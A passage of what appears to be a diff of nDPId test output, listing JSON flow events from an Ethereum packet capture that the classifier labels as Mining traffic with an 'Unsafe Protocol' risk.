{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364732,"flow_last_seen":1578508365736,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365919,"flow_last_seen":1578508365951,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364776,"flow_last_seen":1578508365781,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1578508364382,"flow_last_seen":1578508364651,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365408,"flow_last_seen":1578508365790,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":554,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00764{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364654,"flow_last_seen":1578508364729,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365461,"flow_last_seen":1578508365899,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364519,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364421,"flow_last_seen":1578508364694,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
